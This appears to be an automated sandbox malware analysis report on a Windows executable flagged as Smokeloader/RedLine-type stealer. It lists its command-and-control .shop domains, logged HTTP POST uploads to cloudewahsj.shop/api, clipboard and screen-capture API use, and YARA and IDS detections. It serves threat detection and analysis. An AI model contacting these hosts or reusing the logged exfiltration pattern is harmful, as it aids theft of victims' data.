Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop

Source: Joe Sandbox View

IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49710 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49721 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49738 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49732 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49752 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cloudewahsj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: cloudewahsj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WALCCX02KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12785Host: cloudewahsj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y54Q85KT7OQETH72FUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15071Host: cloudewahsj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1U554ERFNUHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20354Host: cloudewahsj.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: cloudewahsj.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cloudewahsj.shop

Source: SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: SOElePqvtf.exe, 00000000.00000002.1585486653.000000000062B000.00000004.00000020.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1387869831.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005BA000.00000004.00000020.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005E6000.00000004.00000020.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1387686449.00000000005C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop/
Source: SOElePqvtf.exe, 00000000.00000003.1387686449.00000000005E6000.00000004.00000020.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1387869831.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop//
Source: SOElePqvtf.exe, 00000000.00000002.1585486653.000000000062B000.00000004.00000020.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000002.1585486653.000000000066C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop/api
Source: SOElePqvtf.exe, 00000000.00000003.1387869831.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop/api-
Source: SOElePqvtf.exe, 00000000.00000002.1585486653.000000000066C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop/api21
Source: SOElePqvtf.exe, 00000000.00000002.1585486653.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop/apie
Source: SOElePqvtf.exe, 00000000.00000003.1402292171.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop/api~:b
Source: SOElePqvtf.exe, 00000000.00000003.1387869831.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudewahsj.shop/d
Source: SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SOElePqvtf.exe, 00000000.00000003.1418679364.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: SOElePqvtf.exe, 00000000.00000003.1418679364.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SOElePqvtf.exe, 00000000.00000003.1418679364.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: SOElePqvtf.exe, 00000000.00000003.1418679364.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: SOElePqvtf.exe, 00000000.00000003.1418679364.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: SOElePqvtf.exe, 00000000.00000003.1418679364.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SOElePqvtf.exe, 00000000.00000003.1418679364.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49752 version: TLS 1.2

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Code function: 0_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_00437A60

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Code function: 0_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_00437A60

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Code function: 0_2_00437C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

0_2_00437C10

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1585442672.0000000000510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0043D0D0	0_2_0043D0D0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0040D172	0_2_0040D172
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00408A60	0_2_00408A60
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00422370	0_2_00422370
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00421B30	0_2_00421B30
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00418BA2	0_2_00418BA2
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00437850	0_2_00437850
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0041906A	0_2_0041906A
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00426010	0_2_00426010
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004438E0	0_2_004438E0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004180F0	0_2_004180F0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004438F9	0_2_004438F9
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004438FB	0_2_004438FB
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00427885	0_2_00427885
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0041D8B0	0_2_0041D8B0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00406950	0_2_00406950
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00444950	0_2_00444950
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0040E16E	0_2_0040E16E
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0043210B	0_2_0043210B
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00403910	0_2_00403910
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00429917	0_2_00429917
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00406120	0_2_00406120
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0040B92C	0_2_0040B92C
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0042F1C1	0_2_0042F1C1
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004239EB	0_2_004239EB
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00421180	0_2_00421180
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0041618C	0_2_0041618C
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0043099F	0_2_0043099F
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0041F9A0	0_2_0041F9A0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0041D1B0	0_2_0041D1B0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0042E9B0	0_2_0042E9B0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0041BA52	0_2_0041BA52
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0043025E	0_2_0043025E
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0042621B	0_2_0042621B
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0042BA20	0_2_0042BA20
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00417222	0_2_00417222
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00443A30	0_2_00443A30
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004042C0	0_2_004042C0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00443AC0	0_2_00443AC0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004302CD	0_2_004302CD
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0040F2D0	0_2_0040F2D0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004442E0	0_2_004442E0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0040B280	0_2_0040B280
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004352B0	0_2_004352B0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00402B40	0_2_00402B40
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00443B60	0_2_00443B60
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00409B70	0_2_00409B70
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00429B7B	0_2_00429B7B
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0042FB7D	0_2_0042FB7D
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00405B00	0_2_00405B00
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00440B00	0_2_00440B00
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00428B10	0_2_00428B10
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00419B30	0_2_00419B30
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00411BDE	0_2_00411BDE
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004123EC	0_2_004123EC
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00428C62	0_2_00428C62
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0043C460	0_2_0043C460
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0043B410	0_2_0043B410
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00441C26	0_2_00441C26
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00444C20	0_2_00444C20
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004064C0	0_2_004064C0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0042F4E1	0_2_0042F4E1
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004324EE	0_2_004324EE
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0041D4A0	0_2_0041D4A0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00408D10	0_2_00408D10
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0043E520	0_2_0043E520
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00442DCA	0_2_00442DCA
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00415DD8	0_2_00415DD8
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00425DA0	0_2_00425DA0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004085B0	0_2_004085B0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00409660	0_2_00409660
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00404E20	0_2_00404E20
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0043C6C0	0_2_0043C6C0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0043E6E0	0_2_0043E6E0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004186E5	0_2_004186E5
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00444680	0_2_00444680
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0041DE90	0_2_0041DE90
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0043CE90	0_2_0043CE90
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00428750	0_2_00428750
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0043DF60	0_2_0043DF60
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00429F7C	0_2_00429F7C
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00433707	0_2_00433707
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00402F10	0_2_00402F10
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00425713	0_2_00425713
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0042F716	0_2_0042F716
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00407730	0_2_00407730
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00427FC0	0_2_00427FC0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004437D0	0_2_004437D0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00433FDF	0_2_00433FDF
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_004127E0	0_2_004127E0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0042A7F0	0_2_0042A7F0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_00434FF0	0_2_00434FF0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0042AF92	0_2_0042AF92
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02135257	0_2_02135257
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02134246	0_2_02134246
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0213D337	0_2_0213D337
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02118357	0_2_02118357
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02132372	0_2_02132372
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02106387	0_2_02106387
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0210E3D5	0_2_0210E3D5
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0210D3D9	0_2_0210D3D9
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_021213E7	0_2_021213E7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0211603F	0_2_0211603F
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02105087	0_2_02105087
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0213D0F7	0_2_0213D0F7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0211E0F7	0_2_0211E0F7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0213E1C7	0_2_0213E1C7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02112653	0_2_02112653
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0213B677	0_2_0213B677
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0213C6C7	0_2_0213C6C7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0211D707	0_2_0211D707
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02106727	0_2_02106727
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02132755	0_2_02132755
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0212F748	0_2_0212F748
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0213E787	0_2_0213E787
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0211D417	0_2_0211D417
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0212F428	0_2_0212F428
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_021304C5	0_2_021304C5
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0210B4E7	0_2_0210B4E7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02135517	0_2_02135517
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0210F537	0_2_0210F537
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02130534	0_2_02130534
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02104527	0_2_02104527
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02144547	0_2_02144547
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_021225D7	0_2_021225D7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0212AA57	0_2_0212AA57
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02112A47	0_2_02112A47
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02137AB7	0_2_02137AB7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0211DB17	0_2_0211DB17
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02127B02	0_2_02127B02
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02103B77	0_2_02103B77
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02144BB7	0_2_02144BB7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02106BB7	0_2_02106BB7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02108817	0_2_02108817
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_021098C7	0_2_021098C7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_021448E7	0_2_021448E7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0213C927	0_2_0213C927
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02117950	0_2_02117950
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0212F97D	0_2_0212F97D
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0213396E	0_2_0213396E
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02107997	0_2_02107997
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_021289B7	0_2_021289B7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02111E45	0_2_02111E45
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02144E87	0_2_02144E87
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02141E8C	0_2_02141E8C
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02108F77	0_2_02108F77
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0212EC17	0_2_0212EC17
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02130C06	0_2_02130C06
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0211FC07	0_2_0211FC07
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_02123C52	0_2_02123C52
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0212BC87	0_2_0212BC87
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0212AC89	0_2_0212AC89
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 0_2_0211BCB9	0_2_0211BCB9
